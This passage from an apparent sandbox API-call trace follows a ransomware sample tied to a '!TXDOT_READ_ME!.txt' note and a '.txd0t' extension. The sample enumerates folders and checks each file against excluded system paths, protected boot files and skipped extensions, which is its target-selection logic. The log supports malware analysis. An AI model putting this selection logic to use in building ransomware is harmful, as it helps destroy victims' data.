psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.422] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.422] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.422] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.422] FindClose (in: hFindFile=0xec25b0 | out: hFindFile=0xec25b0) returned 1 [0071.422] GetProcessHeap () returned 0xe30000 [0071.422] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.422] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1044", cAlternateFileName="")) returned 1 [0071.422] StrCmpW (psz1="1044", psz2=".") returned 1 [0071.422] StrCmpW (psz1="1044", psz2="..") returned 1 [0071.422] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.422] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.422] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1044", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0071.422] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\system32\\") returned 0x0 [0071.422] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.422] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\system\\") returned 0x0 [0071.422] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.422] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.422] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\appdata\\local\\") returned 0x0 [0071.422] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\boot\\") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\perflogs\\") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\programdata\\") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\drivers\\") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\wsus\\") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="crypt_detect") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="cryptolocker") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="ransomware") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="C:\\WINDOWS") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.423] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="C:\\Program Files") returned 0x0 [0071.423] GetProcessHeap () returned 0xe30000 [0071.423] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.423] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0071.423] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\*") returned="C:\\588bce7c90097ed212\\1044\\*" [0071.423] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec22f0 [0071.424] StrCmpW (psz1=".", psz2=".") returned 0 [0071.424] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.424] StrCmpW (psz1="..", psz2=".") returned 1 [0071.424] StrCmpW (psz1="..", psz2="..") returned 0 [0071.424] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.424] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.424] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.424] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0071.424] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") returned="C:\\588bce7c90097ed212\\1044\\" [0071.424] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned="C:\\588bce7c90097ed212\\1044\\eula.rtf" [0071.424] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.424] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.424] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.425] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.425] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.425] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.425] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.425] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.425] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.425] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.425] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.425] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.425] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.425] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.425] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0071.425] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") returned="C:\\588bce7c90097ed212\\1044\\" [0071.425] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" [0071.425] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.425] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.425] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.425] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.426] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.426] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.426] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.426] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.426] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.426] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.426] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.426] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.426] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.426] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.426] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0071.426] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") returned="C:\\588bce7c90097ed212\\1044\\" [0071.426] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" [0071.426] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.426] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.426] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.426] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.426] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.426] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.426] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.426] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.426] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.426] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.427] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.427] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.427] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.427] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.427] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.427] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.427] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.427] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.427] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.427] FindClose (in: hFindFile=0xec22f0 | out: hFindFile=0xec22f0) returned 1 [0071.427] GetProcessHeap () returned 0xe30000 [0071.427] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.427] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1045", cAlternateFileName="")) returned 1 [0071.427] StrCmpW (psz1="1045", psz2=".") returned 1 [0071.427] StrCmpW (psz1="1045", psz2="..") returned 1 [0071.427] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.427] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.427] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1045", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0071.427] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\system32\\") returned 0x0 [0071.427] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.427] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\system\\") returned 0x0 [0071.427] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.427] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.427] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\appdata\\local\\") returned 0x0 [0071.427] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.427] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.427] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.427] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\boot\\") returned 0x0 [0071.427] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\perflogs\\") returned 0x0 [0071.427] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\programdata\\") returned 0x0 [0071.428] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\drivers\\") returned 0x0 [0071.428] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\wsus\\") returned 0x0 [0071.428] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.428] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.428] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="crypt_detect") returned 0x0 [0071.428] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="cryptolocker") returned 0x0 [0071.428] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="ransomware") returned 0x0 [0071.428] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="C:\\WINDOWS") returned 0x0 [0071.428] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.428] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="C:\\Program Files") returned 0x0 [0071.428] GetProcessHeap () returned 0xe30000 [0071.428] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.428] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0071.428] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\*") returned="C:\\588bce7c90097ed212\\1045\\*" [0071.428] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec20f0 [0071.429] StrCmpW (psz1=".", psz2=".") returned 0 [0071.429] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.429] StrCmpW (psz1="..", psz2=".") returned 1 [0071.429] StrCmpW (psz1="..", psz2="..") returned 0 [0071.429] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.429] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.429] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.429] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0071.429] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0071.429] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned="C:\\588bce7c90097ed212\\1045\\eula.rtf" [0071.430] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.430] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.430] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.430] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.430] StrStrIW 